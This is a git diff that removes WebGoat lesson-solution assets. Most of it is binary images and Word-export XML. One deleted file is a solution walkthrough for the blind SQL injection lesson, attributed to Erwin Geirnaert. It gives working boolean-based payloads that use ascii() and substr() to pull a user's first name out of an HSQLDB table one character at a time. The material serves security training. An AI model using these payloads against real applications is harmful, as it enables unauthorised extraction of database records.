deleted file mode 100644
index d167a7f35..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image015.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image017.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image017.png
deleted file mode 100644
index 9139ad257..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image017.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image019.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image019.png
deleted file mode 100644
index f8604adae..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image019.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image021.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image021.png
deleted file mode 100644
index 5788c8d43..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image021.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image023.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image023.png
deleted file mode 100644
index 368d0d456..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image023.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image025.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image025.jpg
deleted file mode 100644
index b1aeffb19..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image025.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image026.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image026.jpg
deleted file mode 100644
index 8addcb872..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image026.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image027.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image027.jpg
deleted file mode 100644
index 0245a850c..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image027.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image028.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image028.jpg
deleted file mode 100644
index 9e6b65ff8..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image028.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image029.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image029.jpg
deleted file mode 100644
index 3586cede5..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image029.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image030.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image030.jpg
deleted file mode 100644
index cdc430d9b..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image030.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image031.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image031.jpg
deleted file mode 100644
index e9bb7a278..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image031.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image032.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image032.jpg
deleted file mode 100644
index b4e1f851a..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image032.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image033.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image033.jpg
deleted file mode 100644
index 468293b14..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image033.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image034.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image034.jpg
deleted file mode 100644
index 3a463c317..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image034.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image035.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image035.jpg
deleted file mode 100644
index 32f9278c2..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image035.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image036.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image036.jpg
deleted file mode 100644
index 1ab696dcd..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image036.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/themedata.thmx b/src/main/webapp/lesson_solutions/BasicAuthentication_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK
deleted file mode 100644
index 5ad40b6cd..000000000
--- a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK
+++ /dev/null
@@ -1,904 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

 

- -

Lesson Plan Title: How to Perform Blind SQL Injection

- -

 

- -

Concept / Topic To Teach:

- -

SQL injection -attacks represent a serious threat to any database-driven site. The methods behind -an attack are easy to learn and the damage caused can range from considerable -to complete system compromise. Despite these risks an incredible number of -systems on the internet are susceptible to this form of attack.

- -

 

- -

Not only is -it a threat easily instigated, it is also a threat that, with a little -common-sense and forethought, can be almost totally prevented. This lesson will -show the student several examples of SQL injection.

- -

 

- -

It is always -good practice to sanitize all input data, especially data that will used in OS -command, scripts, and database queries.

- -

 

- -

General Goal(s):

- -

The user -should be able to view all records in the specified table.  The user could add new records or modify -existing records.

- -

 

- -

From the hints J

- -

Compound SQL -statements can be made by joining multiple tests with keywords like AND and OR. -Create a SQL statement that you can use as a true/false test and then select -the first character of the target element and do a start narrowing down the -character using > and <

- -

 

- -

The backend -database is HSQLDB. Keep that in mind if you research SQL functions -on the Internet since different databases use some different functions and -syntax.

- -

This is the -code for the query being built and issued by WebGoat:

- -

 

- -

"SELECT -* FROM user_data WHERE userid = " + accountNumber

- -

The -application is taking your input and inserting it at the end of a pre-formed -SQL command. You will need to make use of the following SQL functions:

- -

 

- -

SELECT - -query for your target data and get a string

- -

 

- -

substr(string, -start, length) - returns a substring of string starting at the start character -and going for length characters

- -

 

- -

ascii(string) -will return the ascii value of the first character in string

- -

 

- -

> and < -- once you have a character's value, compare it to a choosen one

- -

Example: is -the first character of the first_name of userid 15613 less than 'M' (ascii 77)? -

- -

 

- -

101 AND (ascii( -substr((SELECT first_name FROM user_data WHERE userid=15613) , 1 , 1) ) < 77 ); -

- -

 

- -

If you get -back that account number is valid, then yes. If get back that the number -is invalid then answer is no.

- -

Another -example: is the second character of the first_name of userid 15613 greater than -'m' (ascii 109)?

- -

 

- -

101 AND (ascii( -substr((SELECT first_name FROM user_data WHERE userid=15613) , 2 , 1) ) > 109 -);

- -

 

- -

If you get back -that account number is valid, then yes. If get back that the number is invalid -then answer is no.

- -

 

- -

- -

Figure 1 Lesson 16

- -

For the -query: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613) -, 1 , 1) ) < 77 ); you will get a "Account number is valid". If the -character is bigger then the value you get an invalid account error message.

- -

 

- -

- -

Figure 2 Invalid account number

- -

 

- -

You can -change the < to = to make sure that you have the correct value.

- -

This results -in the query 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE -userid=15613) , 1 , 1) ) = 74 );

- -

 

- -

- -

Figure 3 First character

- -

 

- -

So you know -that ascii(74) is capital J. Now do the same for the second and all other -characters.

- -

 

- -

 

- -

 

- -

The query for -the second character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE -userid=15613) , 2 , 1) ) = 111 );

- -

Ascii(111) = -o, so you have now Jo.

- -

 

- -

- -

 

- -

For the third -character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE -userid=15613) , 3 , 1) ) = 101 ); Ascii(101) = e

- -

For the -fourth character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE -userid=15613) , 4 , 1) ) = 115 ); Ascii(115) = s

- -

For the fifth -character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE -userid=15613) , 5 , 1) ) = 112); Ascii(112) = p

- -

For the sixth -character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE -userid=15613) , 6 , 1) ) = 104); Ascii(104) = h

- -

 

- -

So the name -that you found is Joesph. Enter this in the text field to complete this lesson.

- -

 

- -

- -

Figure 4 Enter the name Joesph

- -

 

- -

- -

Figure 5 Lesson 16 Completed

- -

 

- -

 

- -
-
- - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - -
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@ - - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/filelist.xml
deleted file mode 100644
index 085ceea56..000000000
--- a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/filelist.xml
+++ /dev/null
@@ -1,18 +0,0 @@ - - - - - - - - - - - - - - - - - - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image001.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image001.png
deleted file mode 100644
index 5fef4d85b..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image003.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image003.png
deleted file mode 100644
index 950942ed9..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image005.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image005.png
deleted file mode 100644
index 8c3ee5181..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image007.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image007.png
deleted file mode 100644
index 54ea1bcb2..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image009.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image009.png
deleted file mode 100644
index 3668266c4..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image011.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image011.png
deleted file mode 100644
index 9987542b3..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image013.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image013.jpg
deleted file mode 100644
index f5c8d4841..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image014.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image014.jpg
deleted file mode 100644
index 68702bb41..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image015.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image015.jpg
deleted file mode 100644
index b6e84a5fe..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image016.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image016.jpg
deleted file mode 100644
index 93a58e837..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image017.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image017.jpg
deleted file mode 100644
index 6055cba63..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image018.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image018.jpg
deleted file mode 100644
index 2e2bf3fc5..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg b/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg
deleted file mode 100644
index b7b54355c..000000000
Binary files a/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg b/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg
deleted file mode 100644
index 716f2aad9..000000000
Binary files a/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/CSRF_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/CSRF_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@ - - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/filelist.xml b/src/main/webapp/lesson_solutions/CSRF_files/filelist.xml
deleted file mode 100644
index 7f94019c7..000000000
--- a/src/main/webapp/lesson_solutions/CSRF_files/filelist.xml
+++ /dev/null
@@ -1,16 +0,0 @@ - - - - - - - - - - - - - - - - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image001.png b/src/main/webapp/lesson_solutions/CSRF_files/image001.png
deleted file mode 100644
index 9d82bd95a..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image003.png b/src/main/webapp/lesson_solutions/CSRF_files/image003.png
deleted file mode 100644
index 2189df262..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image005.png b/src/main/webapp/lesson_solutions/CSRF_files/image005.png
deleted file mode 100644
index 95949f62b..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image007.png b/src/main/webapp/lesson_solutions/CSRF_files/image007.png
deleted file mode 100644
index 7bf06a985..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image009.png b/src/main/webapp/lesson_solutions/CSRF_files/image009.png
deleted file mode 100644
index d0e2f233c..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image011.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image011.jpg
deleted file mode 100644
index fbb254bd8..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image012.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image012.jpg
deleted file mode 100644
index 32dbb3c02..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image013.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image013.jpg
deleted file mode 100644
index 8d76909d8..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image014.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image014.jpg
deleted file mode 100644
index be9c8e294..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image015.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image015.jpg
deleted file mode 100644
index ef71f6923..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/themedata.thmx b/src/main/webapp/lesson_solutions/CSRF_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg b/src/main/webapp/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg
deleted file mode 100644
index e51a40ad0..000000000
Binary files a/src/main/webapp/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png b/src/main/webapp/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png
deleted file mode 100644
index e8f391339..000000000
Binary files a/src/main/webapp/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/CommandInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/CommandInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@ - - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/CommandInjection_files/filelist.xml
deleted file mode 100644
index c778dd663..000000000
--- a/src/main/webapp/lesson_solutions/CommandInjection_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@ - - - - - - - - - - - - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image001.png b/src/main/webapp/lesson_solutions/CommandInjection_files/image001.png
deleted file mode 100644
index 95185ac08..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image003.png b/src/main/webapp/lesson_solutions/CommandInjection_files/image003.png
deleted file mode 100644
index bb6e1e518..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image005.png b/src/main/webapp/lesson_solutions/CommandInjection_files/image005.png
deleted file mode 100644
index 9c7ecd242..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image007.jpg b/src/main/webapp/lesson_solutions/CommandInjection_files/image007.jpg
deleted file mode 100644
index d82452e33..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image007.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/CommandInjection_files/image008.jpg
deleted file mode 100644
index 67162e723..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image009.jpg b/src/main/webapp/lesson_solutions/CommandInjection_files/image009.jpg
deleted file mode 100644
index 916c6fdc1..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/CommandInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image001.jpg b/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image001.jpg
deleted file mode 100644
index 408d75d35..000000000
Binary files a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image002.jpg b/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image002.jpg
deleted file mode 100644
index 455c17580..000000000
Binary files a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image003.jpg b/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image003.jpg
deleted file mode 100644
index ef1515bd6..000000000
Binary files a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image003.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHack.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHack.png
deleted file mode 100644
index 3971e484f..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHack.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHacked.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHacked.png
deleted file mode 100644
index 48e299a23..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHacked.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/imgPromptHack.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/imgPromptHack.png
deleted file mode 100644
index df21320e8..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/imgPromptHack.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsComplete.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsComplete.png
deleted file mode 100644
index b44361734..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsComplete.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsHack.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsHack.png
deleted file mode 100644
index 7f0518029..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsHack.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPage.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPage.png
deleted file mode 100644
index 6257299d0..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPage.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPrompt.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPrompt.png
deleted file mode 100644
index 42f27f677..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPrompt.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHack.png b/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHack.png
deleted file mode 100644
index 8e2b1503e..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHack.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHacked.png b/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHacked.png
deleted file mode 100644
index e09a7fc57..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHacked.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenPage.png b/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenPage.png
deleted file mode 100644
index 5c6927667..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenPage.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/DOMInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/DOMInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@ - - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/DOMInjection_files/filelist.xml
deleted file mode 100644
index 44904329e..000000000
--- a/src/main/webapp/lesson_solutions/DOMInjection_files/filelist.xml
+++ /dev/null
@@ -1,18 +0,0 @@ - - - - - - - - - - - - - - - - - - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image001.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image001.png
deleted file mode 100644
index 8d3b529b0..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image002.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image002.jpg
deleted file mode 100644
index 3f3bccdf5..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image003.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image003.png
deleted file mode 100644
index 9effd17b9..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image004.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image004.jpg
deleted file mode 100644
index 016c16e12..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image005.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image005.png
deleted file mode 100644
index 844b00d92..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image006.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image006.jpg
deleted file mode 100644
index c3349b050..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image007.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image007.png
deleted file mode 100644
index d0b0aec8e..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image008.jpg
deleted file mode 100644
index 18a4764fe..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg
deleted file mode 100644
index 1112e63f7..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image009.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image009.png
deleted file mode 100644
index d1021bceb..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image010.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image010.jpg
deleted file mode 100644
index e9bc078c3..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image011.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image011.png
deleted file mode 100644
index efe585a32..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image012.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image012.jpg
deleted file mode 100644
index dd8bf4ac4..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/DOMInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/themedata.thmx and /dev/null differ
